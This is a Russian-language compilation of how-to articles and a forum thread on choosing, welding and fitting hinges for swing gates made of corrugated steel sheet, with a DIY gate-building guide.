145 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Размер петель для ворот из профнастила

Какие петли лучше для ворот распашных

Данная информация должна помочь владельцу подобрать и прикрепить петли для ворот распашных. Ворота распашного типа — самый популярный из всех видов ворот, используемых на частных участках, это обуславливается многими плюсами, которые имеет такое устройство. Существует множество вариантов их исполнения, и изготавливаются они из очень большого перечня материалов.

Общие сведения

Железные ворота ставят на гаражах или заборах, которые ограждают участок периметра. В первую очередь такие ворота выполняют охранные и защитные функции. Они могут быть и отличным элементом декора. Функциональность ворот основан на надежном запирании, прочности, удерживании нагрузок и удобном отпирании/запирании. И это достигается с помощью качественной приварки петель.

Изделия данной категории могут иметь массу от 0,2 до 1,5 т. Для того чтобы конструкция исправно прослужила долгие годы, к ней нужно подобрать исключительно прочную фурнитуру. Куда они будут направлены — наружу или внутрь, зависит от предпочтений владельца. Зимой придется убирать снег, если он мешает открыванию ворот.

Один из основных компонентов, который значительно влияет на функциональность, являются петли, ведь на них висят ворота. Разумный выбор, установка могут значительно увеличить срок службы железных или деревянных распашных ворот.

Различные конструкции, их преимущества и недостатки

Как в наше время определиться с приобретением, если в продаже представлено великое множество моделей с ощутимым разнообразием цен. Распашные ворота обладают рядом преимуществ и недостатков. Среди преимуществ ворот распашного варианта можно выделить:

  1. Простоту конструкции. Их можно изготовить своими руками. Достаточно использовать металлический лист металлопрофиля, а для деревянных ворот соединить несколько досок между собой, чтобы получились воротные створки.
  2. Практичность. Она выражена в таком аспекте, как незамысловатость конструкции, благодаря чему человек всегда имеет возможность раскрыть ворота. Они довольно нечасто заклинивают или еще как-либо портятся.
  3. Обширный ассортимент замков: подойдет любой, можно задействовать обычную защелку.
  4. Возможность простой автоматизации.
  5. Длительность срока эксплуатации.
  6. Возможность отрегулировать уровень открытия створок.
  7. Относительно невысокую цену.

Некоторые недостатки. У данного вида конструкций есть и недочеты, например, необходимость в большом незадействованном пространстве, чтобы ворота отпирались свободно.

Навесы, петли и их виды

Есть множество разновидностей петель:

  1. Усиленные шарнирные — осевой стержень внутри их прикреплен в обеих половинках карты. Вследствие этого образуется соединение по типу цилиндра, которое способно вращаться.
  2. Полушарнирные. В них стержень оси присутствует лишь в единственной половинке карты, который соединяется с шарнирным колпачком во 2 половине карты. Данный вид позволяет без труда снимать створки, значит, не очень устойчив ко взлому.
  3. Двусторонние. Предназначены для установки на любой стороне воротной системы.
  4. Имеющие стопор. Способны предотвратить расшатывание створок, упростить открывание ворот, независимо от погодных условий.
  5. Регулируемые. Позволяют настраивать по высоте положение створок. Их стоит использовать, если присутствует возможность перемещения опор. Но минусом этих петель является то, что максимальная масса, которую они могут выдержать, не должна превышать 200 кг.
  6. Кованые. Это старый вид воротных петель, который возник много лет назад, но и по сей день применяется для удерживания створок деревянных ворот. Сегодня чаще всего петли кованого типа применяются для создания оригинальных решений по дизайну. Но некоторые современные петли кованого типа не уступают по прочности их аналогам.

Чтобы ворота долго служили и соответствующим образом выполняли функции, необходимо правильным образом выбрать петли. Детали для любой распашной системы являются одним из наиболее значимых компонентов. Петли на ворота необходимо выбирать, учитывая следующие факторы: массы створок, груза, который они способны претерпевать (также зависит от данного фактора изменение числа петель), материала ворот, габаритов дверей.

Для деревянных ворот или конструкций из металла наилучшим вариантом станут петли, имеющие подшипники, количество которых — 4 шт. и больше, для открытия и закрытия без рывков. Данного количества будет достаточно для ворот длиной 2,5–3 м.

Воротные петли различаются также методом крепления, они могут быть закручены на винт, приварены или закреплены на гайки с саморезами.

При отборе петель и навесов требуется учитывать некоторые факторы:

  1. Уровень шума необходимо свести к минимуму. Безупречно, если ворота раскрываются совсем бесшумно.
  2. Полотно от створок не должно провисать.
  3. Они обязаны быть качественными и крепкими, чтобы избежать их взлома.
  4. Легкость поворачивания.
  5. Уровень ширины размаха створок.

Крепеж петель

На сегодняшний день применяются 2 ключевых способа крепежа.

Саморезы, которые употребляются для нетяжелых и маленьких конструкций с небольшой массой или обычных калиток. Если хозяин хотя бы раз ставил двери, то установка створок ворот с применением саморезов станет довольно легким занятием. Это очень схоже, по своей структуре с установкой обычных, домашних дверей между комнатами. К части фасада, створкам и столбам закрепляются воротные петли, поэтому являются нелишним элементом декора конструкции. Лучше их использовать для легких железных и деревянных ворот.

Сварка подходит для массивных стальных систем. Научиться пользоваться сварочным аппаратом экспресс-методом не выйдет, лучше доверить данное дело опытному сварщику. Если у человека уже есть некоторый удачный опыт работы со сварочным агрегатом, тогда легко удастся закрепить петли на ворота. Для этого есть 2 способа:

  1. Для начала нужно приварить навес к самой створке, затем 2 часть петли — к столбу. Перед этим все уже должно быть правильно замерено, чтобы конструкция безупречно сходилась, и ворота хорошо выполняли функции открытия и закрытия.
  2. Данный способ заключается в приваривании навеса к створке и последующего его установления в области проема. Чтобы слегка поднять конструкцию, подойдут брусочки из дерева. Затем требуется отметить место для сварки 2 части петель.

После того как установят конструкцию, производится тестирование плавности хода открытия и закрытия створок. Петли, которые сделаны из многогранников, варить посложнее.

Несколько рекомендаций по сварке


Чтобы ворота раскрывались без усилий, не повело сталь и створки прикрывались вплотную, необходимо следовать этим рекомендациям профессионалов сварочного дела:

  1. Прямые петли гораздо комфортнее приварить непосредственно в горизонтальном виде, например, положив их на землю.
  2. Перед самой сваркой следует подложить подкладку, она должна находиться под нижней долей створки. Подкладка обязана быть примерно в половину длины петли, а верх области створки нужно удерживать рукой.
  3. Сварочный шов производится снизу и вверх.
  4. Пока петли еще незакрепленные, стоит положить вдоль них небольшой брусок прямоугольной формы, это поможет выставить эти детали правильным и точным образом.
  5. Не следует раскрывать ворота, пока швы от сварки до конца не остынут.
  6. Приваривать лучше небольшими прихватами, по 2 раза с каждой стороны поочередно.
  7. До окончания сварки, т. е приварки петель внутри, надо протестировать плавность хождения створок. Не должно быть рывков: если их заметили, то стоит сделать еще несколько прихватов сваркой с наружной стороны.
  8. Когда опорные столбики имеют безугольную форму, необходимо будет произвести выпуск в 5 мм наружу, а когда столбы имеют форму прямоугольника делается закрепление на одной высоте с лобовой поверхностью опорной стороны.
  9. Чтобы размеренно распределить нагрузку, стоит приварить к петлям вспомогательные стальные пластины — монтажные.

Скрытые петли, имеющие роликовый тип, лучше предоставить специалисту. Данный вид работы потребует навыков и профессионализма.

Несколько отличительных черт приварки петель к профнастилу

Довольно часто в роли материала для создания ворот или заборов используют профилированный лист. Если человеку требуется приварить петли к данному материалу, то следует учесть некоторые факторы. Требуется изготовить перемычки, которые должны быть параллельны вертикальной части створки.

Нужно закрепить перемычки в тех местах, где привариваются петли. Они должны делить створку на 3 одинаковых элемента. К перемычкам сваркой надо приварить петли. Чтобы закрыть область приваривания и перемычки, сверху можно прикрутить маленькие куски профнастила. Лучше отдать предпочтение более толстым петлям длиной более 1 м.

Как избежать неприятных последствий при сварке?


Нельзя использовать плохо работающий сварочный аппарат. Начинать варить можно будет лишь после того, как целиком засохнет краска. На одежде не должно иметься никаких остатков воспламеняющихся жидкостей: жира, бензина. Не следует варить детали, находящиеся под давлением. Запрещается также развешивать на баллон сварки насыщенную легковоспламеняющимися жидкостями ткань, зачастую такие действия становятся причиной пожара.

После окончания работ желательно обработать швы болгаркой.

Заключение

Если человек решился приобрести готовые петли для распашных ворот, то предлагается несколько рекомендаций, которые не позволят ему совершить ошибочный выбор. Регулируемые петли станут неплохим вариантом, если территория участка подвержена пучению грунта, т. к зимой ворота подвергаются перегрузке на оси, из-за этого они будут нуждаться в постоянной настройке. Если петли своевременно не регулировать, то они имеют шанс испортиться, и это может привести к серьезному перекосу или поломке всей конструкции.

Не стоит приобретать продукт от малоизвестного изготовителя, кроме того, лучше избегать очень дешевой фурнитуры. Но и очень высокая цена не показатель качества, так что нужно выбирать с умом. Стоит помнить, что от качества петель зависит степень безопасности дорогого имущества, которое может храниться в собственном гараже. Наиболее прочными сейчас являются сплавы из стали, в которые добавляют различные виды полимеров, они могут выдерживать сильные перепады температуры и очень большой вес, не нуждаются в смазывании и долго не изнашиваются. Еще есть петли из высокоуглеродистой стали, их чаще применяют для промышленного использования, но они способны выдерживать большие нагрузки и в быту.

Нужно быть внимательным: следует изготавливать или выбирать в магазине только качественные петли, чтобы избежать проблем с таким важным охранным аспектом, как ворота.

Выбор петель для металлических ворот

Добрый день, уважаемые форумчане!
Подскажите, пожалуйста, какие приварные петли купить для ворот (в смысле, какого диаметра корпуса/оси).
Исходные данные (примерные) следующие: створка ворот размерами 2Х2 м, рамку ворот буду варить из трубы 60х40х3 (итого 8 м трубы), внутри рамки — усиливающий «крест» из трубы 40х40х3 (итого 4 м). Зашивать ворота планирую листом 2 мм (итого 4 м2). Материал на створки уже был приобретен по случаю (давно). Столбы ворот, к которым будут приварены петли — планируется труба 100х100х3 мм.
Таким образом, исходя из веса металла (по справочнику) получается вес одной створки:
P= 8х4.31+4х3,37+4х16,6=114,36 кг
Подойдут ли петли с внешним диаметром 30мм и диаметром оси 20мм с шариком внутри, которые продаются на рынке?
Или всё-таки взять диаметром не менее 40 мм, как мне уже посоветовали?
Хватит ли двух петель на створку?
Заранее благодарю.

не менее 40 мм. с шариком, а еще желательно отверстие для смазки.

Благодарю.
Значит, буду покупать круг 40 и искать токаря.
И ещё вопрос: в продаже на металлобазе имеется круг 40 из сталей: Ст.3, Ст.20, Ст.45. Цена отличается непринципиально для такого количества металла.
Какой лучше взять? Возможно, Ст.20 — на прошлой работе из неё точили разные патрубки под высокие давления?

Cт.20. Хотя и Ст.3 сойдет вполне.

Спасибо, вот ещё нашел некоторую инфу по петлям для ворот (размер-нагрузка): » >

Basill написал :
Подойдут ли петли с внешним диаметром 30мм и диаметром оси 20мм с шариком внутри, которые продаются на рынке?

Подойдут, у вас ворота маленького размера.

Имеет смысл поставить сверху 2 петли. Петли приваривать не к двойке, а к каркасу или усилять обшивку листом 3. 5мм в точках крепления петель.
P.S. Но Д40мм, конечно надежнее.

Ushakov , Samar , а также chico63 , благодарю за помощь!
Вопрос решен. На металлобазе был приобретен круг 40 из стали 20, в «подшипниковой» фирме — шарики соответствующей твёрдости (говорят, сейчас рынки завалены китайскими металлическими шариками из пакетиков с надписями «для рогаток», так что на базаре брать не советую).
Пришлось на компе набросать эскиз, найти токаря — и вот они, долгожданные шарниры для ворот! Получилось ненамного дешевле, чем на рынке + потраченое доп. время, но есть уверенность в качестве.
Прилагаю эскиз в формате pdf, может кому пригодится. Прошу сильно не пинать, последний раз машиностроительным черчением занимался четверть века назад, на 1 курсе института, потом только электрорадиосхемы. Впрочем, опытный токарь воспринял эскиз без лишних вопросов.

Basill написал :
Прошу сильно не пинать,

Отличный чертеж, как говорится : » мастерство не пропьешь».
Всвязи с этим небольшая задачка:
Как вы думаете , почему большинство изготовителей приваривает петли к раме ворот «папой» вверх, а к створкам «мамой» вниз?

чтоб ворота если что снять было легче ))))
а вот чтоб не сняли..нижнюю так, а верхнюю наоборот..папой вниз..но это ворота получается только «по месту» можно устанавливать/приваривать..
хотя мы на даче таки напутали..и на одной половине ворот приварили обе «кверху папой»..

Samar написал :
Как вы думаете , почему большинство изготовителей приваривает петли к раме ворот «папой» вверх, а к створкам «мамой» вниз?

я бы так приварил чтобы вода в петлю не затекала

Basill написал :
Прилагаю эскиз в формате pdf, может кому пригодится. Прошу сильно не пинать,

Basill написал :
Впрочем, опытный токарь воспринял эскиз без лишних вопросов.

А, вот, любопытно, токарь таки точно выполнил диаметры 27 и 27,5 мм? Что-то мне подсказывает, что он слукавил и взял сверло другого (без дробей в мм) диаметра

PS последний раз ручки на токарном станке крутил примерно те же 25 лет назад и тоже потом больше радиосхемы

GVK написал :
А, вот, любопытно, токарь таки точно выполнил диаметры 27 и 27,5 мм? Что-то мне подсказывает, что он слукавил и взял сверло другого (без дробей в мм) диаметра

Диаметр сверления мне подсказал токарь. В первом варианте эскиза там были диаметры 20,5/21, но при предварительных переговорах компромисс между жесткостью «пальца» и толщиной стенки стакана (который к тому же поведёт при сварке) по его совету был сдвинут в пользу «пальца», исходя из веса проектируемых ворот. Я так и нарисовал. Не знаю, из чего исходил токарь — из своего опыта, наличия сверла нужного диаметра, желания поменьше снять металла на штыревой части. К тому же я уже купил шарики диам.18,3 , а другие в розницу в фирме купить было проблематично (всё-таки спецуха, они торгуют пачками по 1000 шт, и этот диаметр подобрали из остатков). В общем, доверился профессионалу.
Когда приварю петли (а здесь я тоже «чайник» — как бывший электронщик собрал пару лет назад сварочный инвертор, и теперь руки чешутся тыкать электродом во всё металлическое на даче ), то отпишусь, повело отверстие или нет. Кстати, сверло 27,5 мм — это не экзотика — ссылку давал в ветке про сварку ув. Malevich : » >

Воротные петли – как правильно выбрать комплект

Гараж – надежное место для хранения автомобиля, предназначенное не только для защиты от негативного воздействия окружающей среды, но и для предотвращения угона. Для того, чтобы гаражные ворота обеспечивали должный уровень безопасности, следует установить хорошие петли для распашных ворот (либо других, смотря какой конструкции ваши ворота). Здесь то и возникает проблема с правильным выбором гаражных петель – как определиться с покупкой, если на сегодняшний день в продаже представлены многочисленные модели с достаточно большим разбросом цен? Не волнуйтесь – данное руководство поможет вам принять решение.

Петли для гаражных ворот

Выбор механизма

Основные виды гаражных петель

Стремительный технический процесс затрагивает многие аспекты нашей жизни, и даже петли для деревянных ворот (как и металлических) не являются исключением. Если раньше фурнитура для гаражных дверей была очень простой и однообразной, то сегодня можно найти множество видов различных петель, которые отличаются своими особенностями и достоинствами.

В таблице представлены основные виды.

Какие петли на ворота выбрать из такого разнообразия? Если у вас уже плывет перед глазами от широкого ассортимента современных магазинов, читайте дальше, чтобы узнать правила выбора.

Почему шарнирные петли так хороши

Нельзя не отметить тот факт, что шарнирные воротные петли отличаются высокой популярностью. Она во многом обусловлена многочисленными достоинствами таких петель, которые приведены ниже:

  • Легкость, плавность и бесшумность поворота при условии регулярного смазывания.
  • Шарнирные петли для металлических ворот обладают высокой стойкостью ко взлому.
  • Способность выдерживать большую нагрузку, особенно у петель с большим шарниром.
  • Отсутствие вероятность самопроизвольного закрывания и открывания (при условии правильной установки ворот для гаража в вертикальной плоскости).

Указанные выше положительные качества позволяют устанавливать шарнирные петли на ворота из профнастила. Так, шарниры, которые устанавливаются внутри петель, изготавливаются из прочных и надежных металлов с достойными эксплуатационными характеристиками. Благодаря этому увеличивается не только возможная нагрузка на петли со стороны тяжелых дверных створок ворот, но и продолжительность их службы.

Цилиндрические гаражные петли разных размеров

Важно правильно подобрать количество и параметры шарниров, исходя из массы двери ворот, например:

  • Для легкой калитки из профнастила достаточно одного шарнира на петлю с диаметром 25 мм.
  • Для стандартной воротной двери придется выбирать петли с шарнирами диаметром от 35 мм.
  • В случае, если планируется установить массивную гаражную дверь, необходимо увеличивать не только диаметр шарнира, но и количество таких шариков в одной петли (до 2-3 штук на створку).

Выбираем форму петель

Современные петли для ворот изготавливаются в различных форм-факторах, которые имеют как достоинства, так и недостатки. Можно классифицировать гаражную фурнитуру на три вида:

  • Цилиндрические. Наиболее распространенный выбор несмотря на свой довольно непривычный вид. Для установки таких петель необходимо использовать сварку, причем перед привариванием петель требуется приварить ушки для их надежного крепления.
  • Квадратные. Такие петли очень легко и надежно привариваются к основанию за счет большой площади контакта поверхностей благодаря своей квадратной форме.
  • Шестигранные. Петли, которые не нашли широкого применения на практике, однако их все же можно встретить в продаже. Мало чем отличаются от круглых, для их приваривания также потребуется заняться предварительным привариванием ушек для установки петель.

Петли разной формы

  • Каплевидные. Такая форма присуща только петлям с подшипником. Помимо эстетичного внешнего вида, данный тип отличает два неоспоримых достоинства – равномерный сварочный шов и удобство в установке, которые достигаются за счет особой формы.

Каплевидное сечение петли с подшипником

  • Петли-стрелы. Могут использоваться на как на воротах из дерева, так и на металлических изделиях. Особая форма позволяет петле иметь запас прочности, а также придает ей достаточно колоритный внешний вид.

Из представленных форм-факторов петель лучшим вариантом будет цилиндрическая гаражная петля с шариком. Несмотря на необходимость проведения дополнительных работ при монтаже, такие петли отличаются хорошими эксплуатационными характеристиками и надежностью.

Применение внутренних петель

Несмотря на некоторые разногласия среди пользователей по поводу скрытой фурнитуры для гаражей, внутренние петли отличаются следующими преимуществами:

  1. Более высокий уровень безопасности и взломоустойчивости, что особенно актуально, если в гараже у вас хранится весьма дорогое и ценное для вас имущество.
  2. Длительный срок службы, который на практике исчисляется многими десятилетиями.
  3. Высокая устойчивость к нагрузкам, благодаря которой на скрытые петли можно без особых последствий для общей конструкции навесить двери массой до 400-500 кг каждая.

Если вы цените безопасность своего имущества, скрытые петли станут для вас отличной инвестицией и обеспечат вам спокойствие за свои владения.

Внутренние петли для гаража

О чем еще следует знать

Не имеет значения, какую именно модель вы хотите купить – петли-стрелы или скрытую фурнитуру для гаражных ворот, следующие общие рекомендации позволят вам не ошибиться и сделать выбор:

  • Если на вашем участке грунт пучинистый (то есть подверженный значительному увеличению во время морозов), обратите внимание на такие изделия, как регулируемые петли. В зимнее время гаражные ворота испытывают очень большую нагрузку на оси, поэтому петли необходимо регулярно настраивать. Если такой возможности не будет, вовремя не регулированные петли могут испортиться и привести к значительному перекосу и даже выходу всей конструкции из строя.

Модели регулируемых петель

  • Не покупайте продукцию от неизвестных производителей. Также проходите мимо чрезмерно дешевой фурнитуры. Помните, что от ее качества напрямую зависит сохранность вашего дорогого имущества, хранимого в гараже. Будьте внимательны.
  • Спросите помощи. Не стесняйтесь задавать вопросы продавцу в магазине при покупке фурнитуры для гаражных ворот. Возможно, он сможет ответить на все ваши вопросы и действительно помочь принять правильное в вашем случае решение.

Для того чтобы закрепить полученную информацию, предлагаем просмотреть видеоролик.

Ворота из профнастила своими руками: делаем качественно и красиво

Ассортимент материалов для изготовления ворот необычайно широк, но индивидуальные застройщики отдают предпочтение профнастилу. Выбор обусловлен качествами этого материала. Он прочный, долговечный, лёгкий, декоративный, недорогой и простой в монтаже. Чтобы изготовить ворота из профнастила собственными руками, достаточно минимального количества инструментов и комплектующих и нескольких свободных дней.

Характеристики профнастила — достоинства и недостатки

Профилированные листы производят в заводских условиях по технологии холодного ката из стального листа. Лист оцинковывается с двух сторон, и это защищает его от воздействия внешних факторов и коррозии. В целях декоративности и дополнительной защиты профнастил также покрывают тонким слоем полимера самых разных расцветок.

Ворота из профнастила можно украсить коваными элементами

Профлист обладает разнообразными преимуществами:

  • долговечность. Качество материала обеспечивает срок службы до 50 лет;
  • внешний вид. Изделия из профнастила смотрятся основательно и привлекательно, хорошо сочетаются с любым материалом. Благодаря широкой гамме текстур и расцветок можно экспериментировать с дизайном изделия;
  • небольшой вес и, соответственно, малая нагрузка на опоры. Эта особенность облегчает доставку и монтаж материала. Более того, для лёгкой обшивки не требуются массивные опорные столбы, что сокращает затраты;
  • простота в уходе и эксплуатации. Ворота из профилированного листа не нуждаются в покраске, не выгорают и не тускнеют от воздействия погодных факторов;
  • доступная цена. С учётом вышеперечисленных характеристик стоимость материала в сравнении с другими подкупает.

Недостатками можно считать:

  • необходимость свободного места для открывания;
  • вероятность стукнуть створкой автомобиль;
  • повышенную ветровую нагрузку в регионах со сложными метеоусловиями.

Помимо профлиста, для создания ворот понадобится профилированная труба прямоугольного сечения. Конструкция представляет собой прямоугольную раму из профиля, к которой крепятся створки из профлиста. Размер створок определяет вид транспорта, который будет проезжать через ворота. Если это легковая машина, то достаточно общей ширины 3–4 м. Для грузового автомобиля воротный проём должен быть не меньше 5 м.

Выбор профнастила

Между собой профлисты различаются по толщине, степени прочности и высоте ребра.

  • «С» облегчённый и прочный оцинкованный стеновой лист с малой толщиной и высотой ребра. Самый распространённый вариант выбора;
  • «НС» более плотный профлист с большей высотой ребра, но и более тяжёлый;
  • «Н» массивный несущий профлист, использующийся для кровель огромной площади. Для ворот не подходит по причине большого веса и высокой стоимости.

В зависимости от вида и размера профнастил используют для кровли, опалубки, стен, заборов

Лучшим выбором будет профилированный лист марки С8 или С10. Число обозначает высоту волны в сантиметрах. Толщина листа этой марки составляет от 0,4 до 0,8 мм. Створки из профлиста марки С будут весить от 25 до 40 кг, поэтому их легко можно навесить вдвоём, без использования специального подъёмного оборудования. В силу того, что одного профлиста на створку будет недостаточно, размер рассчитывается исходя из ширины материала.

Фотогалерея: варианты ворот из профнастила

Изготовление ворот из профнастила

Порядок действий по изготовлению ворот из профнастила обусловлен логикой строительства.

Чертежи и расчёт размера ворот

Наибольшее распространение имеют два варианта ворот из профилированного листа — распашные и откатные. Но если откатные ворота в домашних условиях изготовить сложно, то распашную конструкцию, состоящую из двух одинаковых частей, собрать вполне реально. Створки распашных ворот могут открываться наружу или внутрь. Калитку можно либо врезать в одну из створок, либо установить отдельно сбоку от ворот. Это зависит от наличия свободного пространства. Перед сборкой и установкой ворот необходимо нарисовать чертёж, на котором будут указаны точные размеры изделия.

Чертёж каркаса распашных ворот с замерами поможет самостоятельно изготовить их

Схема должна включать:

  • ширину проёма;
  • количество стоек и их сечение;
  • глубину вкапывания опор;
  • чертёж каркаса с указанием всех длин;
  • положение калитки и её размеры;
  • место для петель;
  • место для замка;
  • место для засова;
  • элементы усиления и их длину.

Ворота из профнастила можно сделать без калитки, но тогда ими неудобно будет пользоваться.

Если ворота небольшого размера и нетяжёлые, можно обойтись без калитки

Чаще изготавливают ворота из профнастила с отдельной или встроенной калиткой.

Громоздкие и тяжёлые ворота подразумевают обязательное строительство калитки

Для создания распашных ворот из двух створок с калиткой из профлиста размером 3×2 м понадобятся следующие материалы:

  • профильная труба из металла 20×20×3 мм с квадратным сечением для формирования внутреннего обрамления створок ворот и основы калитки;
  • труба для опор квадратная 60×60×3 мм; для рамы створок 60×40×3 мм;
  • труба с квадратным сечением 40×40×2 мм для рёбер жёсткости каркаса;
  • стеновой профнастил с волной 15–21 мм. Можно взять как просто оцинкованный С8, так и лист с полимерным цветным покрытием — зависит от бюджета; нарезать листы лучше в мастерской, так как при кустарном раскрое по краям может пойти коррозия;
  • уголки и отливы;
  • петли — по две на каждую створку и две на калитку;
  • саморезы по металлу кровельные оцинкованные или под цвет профнастила;
  • саморезы для крепежа листов или шурупы-шестигранники;
  • заклёпки;
  • электроды для сварки диаметром 2–3 мм;
  • грунтовка для металлических изделий;
  • декор (если надо).

Подготовка инструментов для изготовления ворот

Для строительства ворот из профнастила понадобятся:

  • дрель;
  • сварочный инвертор;
  • болгарка;
  • шуруповёрт;
  • лазерный или любой другой уровень;
  • отвес;
  • ножницы по металлу;
  • краскопульт или кисти.

Сборка каркаса

Поскольку рама несёт на себе всю ветровую нагрузку, а жёсткость профнастила на кручение невелика, важно сделать раму как можно более надёжной. Рама ворот собирается на ровной поверхности размером хотя бы с одну створку ворот. Чтобы получились прямые углы, используют специальные точные угольники.

  1. Сначала делают заготовки из металла под углом 45 °.
  2. Каждую заготовку очищают от ржавчины и грязи при помощи щётки — насадки на дрель.

С помощью специальной насадки на дрель заготовки очищают от ржавчины и грязи

Рама из профильной трубы укрепляется стальными уголками

Петли для ворот из профнастила могут быть не слишком большого размера, так как ворота нетяжёлые

Сварные швы очищают от шлака, чтоы лучше держалась краска

Перед покраской каркас обязательно обезжиривают

Дорожный просвет должен составлять не менее 5 см для асфальтированного покрытия и 15–30 см для грунтового. Если просвет получился слишком большим, то на него можно установить съёмную планку, снимающуюся в зимний период.

Видео: сборка каркаса ворот из профнастила

Если в створке запланирована калитка, то каркас собирается по-другому:

    В нужной створке создают каркас калитки размером 180×80 см.

Ширина калитки в створке ворот составляет не более двух третей ширины створки

Если калитка из профнастила расположена в створке ворот, необходимы прочные петли, способные удержать двойной вес

Створка ворот с врезанной калиткой укреплена дополнительной профильной трубой

Видео: сборка каркаса ворот из профнастила со встроенной калиткой

Обшивка рамы

Обшивку рамы осуществляют сразу же после сборки каркаса. Профлист можно крепить несколькими способами — прикрутить шурупами с шестигранной головкой или саморезами. Стыки дополнительно фиксируют заклёпками или саморезами. Предпочтительней саморезы, так как они исключают попадание воды в место крепления. Профлист можно монтировать как с одной, так и с обеих сторон каркаса. Профлист необходимо закрепить и на перемычках.
Украсить обшивку можно коваными элементами, которые привариваются или прикручиваются к профлисту в соответствии с чертежом.

Установка петель

Поскольку ворота из профлиста изрядно парусят, петли лучше выбирать дорогие, желательно на подшипниках. Сначала петли привариваются на каркас, а потом на опорную стойку, но можно и наоборот. Для тяжёлых ворот используется не менее 3 петель. Местоположение петли влияет на расположение створки в распахнутом состоянии. Если необходимо, чтобы створки открывались в обе стороны, к опоре петлю приваривают встык. Если в одну — то накладывают петлю на раму.

Врезка замков

Замки врезаются после навешивания створок. Различаются они по правилам установки и видам:

    навесные. Для них нужно предусмотреть специальные петли ещё на этапе сваривания каркаса;

Навесной замок на ворота из профнастила удобен в местностях с пучинистым грунтом

Для монтажа накладного замка на ворота изнутри устанавливается дополнительный элемент каркаса

Врезной замок может закрываться на ключ или с помощью специальной начинки, встроенной в ручку

Обязательно приваривается труба для фиксатора ворот из арматуры от ветра и для перераспределения нагрузки с замка. Можно также установить защёлку или запор.

Пошаговое руководство по установке ворот из профлиста

  1. Первым делом осуществляется разметка места для ворот.
  2. Далее выкапываются ямы для столбов глубиной не менее одного метра. Перед вкапыванием опоры обрабатываются грунтовкой против коррозии.

Ямы для столбов можно выкапывать вручную или с использованием бура

Раствор для укрепления столбов необходимо хорошо утрамбовать

Для закрытия незатвердевшего бетона от дождя удобен рубероид — распространённый недорогой материал

Чтобы ворота стояли ровно, перед установкой нужно выставить створку и подложить под неё камень или кирпич

Замки, украшения, кованые элементы устанавливаются на ворота из профнастила в последнюю очередь

Профлист хорош тем, что не требует покраски. Зато можно приобрести уже готовый материал, стилизованный под дерево или камень. Можно украсить ворота коваными элементами или другим декором — сверху или по полотну створок. Чтобы украсить ворота, можно фигурно обрезать верхний край, но потом его необходимо защитить профилем.
При желании профлист можно разрисовать специальными красками, устойчивыми к внешним воздействиям.
Свободно пользоваться воротами можно только через месяц после установки.

Видео: изготовление распашных ворот из профнастила

Таким образом, используя подробную инструкцию по изготовлению, сделать ворота из профилированного листа не так сложно, как кажется. Они не только украсят входную группу, но и добросовестно прослужат не один десяток лет.

Петли и шарниры на ворота распашного типа

Распашные ворота — самый распространенный вид въездных ворот на частных участках. Одна из их основных деталей, качество которой сильно влияет на функциональность, — петли на ворота. Правильный подбор, установка и эксплуатация позволяют существенно продлить срок эксплуатации распашных ворот.

Ворота распашного типа из профнастила в заборе из кирпича

Плюсы и минусы распашных ворот

Среди плюсов ворот с распашной конструкцией следует отметить:

  1. Простоту конструкции. Ее вполне можно изготовить самостоятельно. Достаточно использовать лист металла, металлопрофиля или скрепить между собой доски, чтобы получить створки для ворот;
  2. Удобство. Оно состоит в том, что из-за простоты конструкции вы всегда сможете открыть свои ворота. Они крайне редко заедают или еще как-то ломаются;
  3. Широкий выбор замков — подойдет любой, можно использовать даже простую задвижку;
  4. Возможность легкой автоматизации;
  5. Долгий срок эксплуатации;
  6. Возможность регулирования открытия створок;
  7. Низкую стоимость.

Виды петлей и навесов

Чтобы ворота долго и исправно функционировали, вам необходимо правильно подобрать для них петли. Фурнитура для любой распашной конструкции — один из самых важных элементов.

Петли на ворота выбираются в зависимости от таких факторов:

  • веса створок;
  • нагрузки, которую могут выдержать (в зависимости от этого меняется количество петель);
  • материала ворот;
  • габаритов створок.

Петли для ворот отличаются также способом крепления:

  • закрутка на винты;
  • сварка;
  • гайки или саморезы.

Выбирая петли и навесы для ворот, учитывайте следующее:

  • уровень шума должен быть сведен к минимальному. Идеально, если ворота распахиваются вовсе без шума;
  • полотно створок не должно провисать;
  • петли для ворот должны быть долговечны и стойкими к взлому;
  • легкость поворота;
  • ширину распахивания створок.

Петли цилиндрические

Цилиндрические петли с шариком (подшипником) внутри отлично подойдут для стандартных распашных ворот, имеющих небольшую массу. Максимальная нагрузка на одну воротную петлю промышленного производства не должна превышать 400 килограмм. Максимальный удерживаемый вес меняется в зависимости от класса используемой петли. Это следует уточнить при покупке.

Основные разновидности цилиндрических петель

Внутренняя начинка петли скрыта корпусом и выглядит лаконично и привлекательно.

Петли цилиндрические усиленные

Усиленные цилиндрические петли с шариком позволяют удерживать створки с большей массой, до 600 килограмм. Внешне от простых они отличаются только наличием двух дополнительных пластин крепления. Такой крепеж позволяет разделить между массу каркаса между створкой и опорами ворот.

Усиленные цилиндрические петли

Чтобы сделать крепеж таких петель вам потребуется сварочный аппарат или качественные винты. Производятся для правостороннего и левостороннего раскрытия.

Сквозные петли

Если вы не можете использовать винтовой способ крепления или сварку, тогда сквозные петли для ворот — это то, что вам идеально подойдет. Для их крепежа потребуется сверление опорной колонны ворот и саморезы или гайки. Минусом подобных промышленных петель можно назвать небольшую удерживаемую массу — до 200 килограмм. Производят право- и левосторонними.

Сквозная петля

Накладные трехсекционные петли

Навесы для ворот техсекционного типа наиболее востребованы в случае большой массы створок. Большую популярность они заслужили благодаря тому, что:

  • надежны и износостойки;
  • берут на себя всю массу створок и не допускают провисания;
  • плавно и тихо открываются и закрываются;
  • самый высокий уровень взломостойкости среди всех видов петель.

Кованные жиковины

Пусть вас не пугает название — эти петли проверены временем. Их конструкции много сотен лет. Сейчас они используются прежде всего благодаря привлекательному дизайну. Их можно сделать в виде любой фигуры. Лучше всего смотрятся с деревянными и металлическими створками.

Крепление петель

Сегодня применяются 2 основных метода крепления петель:

  1. Саморезы используются для легких конструкций ворот с небольшой массой и калиток.
  2. Сварка подойдет для тяжелых металлических конструкций.

С использованием саморезов

Если вы сами хоть раз устанавливали двери, тогда монтаж створок ворот на саморезы будет для вас простым занятием. Он очень похож на установку межкомнатных дверей. Воротные петли крепятся к фасадной части створок и столбам, поэтому являются дополнительным декоративным элементом конструкции. Лучше всего использовать для деревянных и легких металлических ворот.

Монтаж с помощью сварочного аппарата

